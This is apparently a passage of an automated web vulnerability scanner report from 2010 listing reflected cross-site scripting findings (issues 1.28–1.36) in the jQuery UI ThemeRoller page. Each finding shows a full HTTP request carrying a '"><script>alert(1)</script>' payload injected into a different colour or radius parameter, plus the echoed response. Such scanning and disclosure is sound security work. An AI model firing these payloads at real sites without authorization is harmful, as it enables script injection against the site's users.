GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png6d8aa"><script>alert(1)</script>a079cdcb31f&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:33:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120033

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png6d8aa"><script>alert(1)</script>a079cdcb31f&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

1.28. http://jqueryui.com/themeroller/ [borderColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74af0"><script>alert(1)</script>33f2ea18869 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa74af0"><script>alert(1)</script>33f2ea18869&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:28:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
extureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa74af0"><script>alert(1)</script>33f2ea18869&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorE
...[SNIP]...

1.29. http://jqueryui.com/themeroller/ [borderColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c35c1"><script>alert(1)</script>9623c246bab was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0c35c1"><script>alert(1)</script>9623c246bab&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:25:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ighlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0c35c1"><script>alert(1)</script>9623c246bab&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadad
...[SNIP]...

1.30. http://jqueryui.com/themeroller/ [borderColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31115"><script>alert(1)</script>bb5473053cb was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d331115"><script>alert(1)</script>bb5473053cb&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:26:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d331115"><script>alert(1)</script>bb5473053cb&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTexture
...[SNIP]...

1.31. http://jqueryui.com/themeroller/ [borderColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2637"><script>alert(1)</script>983080c5ba4 was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203ee2637"><script>alert(1)</script>983080c5ba4&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:31:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203ee2637"><script>alert(1)</script>983080c5ba4&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

1.32. http://jqueryui.com/themeroller/ [borderColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7baa"><script>alert(1)</script>666b39dfef6 was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=fffffff7baa"><script>alert(1)</script>666b39dfef6&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=fffffff7baa"><script>alert(1)</script>666b39dfef6&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6
...[SNIP]...

1.33. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9db7f"><script>alert(1)</script>664d66bb6b3 was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e09db7f"><script>alert(1)</script>664d66bb6b3&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:29:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
lass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e09db7f"><script>alert(1)</script>664d66bb6b3&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTe
...[SNIP]...

1.34. http://jqueryui.com/themeroller/ [borderColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aebba"><script>alert(1)</script>f95f6ef0ad9 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999aebba"><script>alert(1)</script>f95f6ef0ad9&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:27:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Default=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999aebba"><script>alert(1)</script>f95f6ef0ad9&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTe
...[SNIP]...

1.35. http://jqueryui.com/themeroller/ [cornerRadius parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e303"><script>alert(1)</script>b0e9e9ddf01 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px9e303"><script>alert(1)</script>b0e9e9ddf01&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Fri, 19 Nov 2010 23:24:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120099

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px9e303"><script>alert(1)</script>b0e9e9ddf01&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImg
...[SNIP]...

1.36. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e89a"><script>alert(1)</script>6b39fffa270 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offset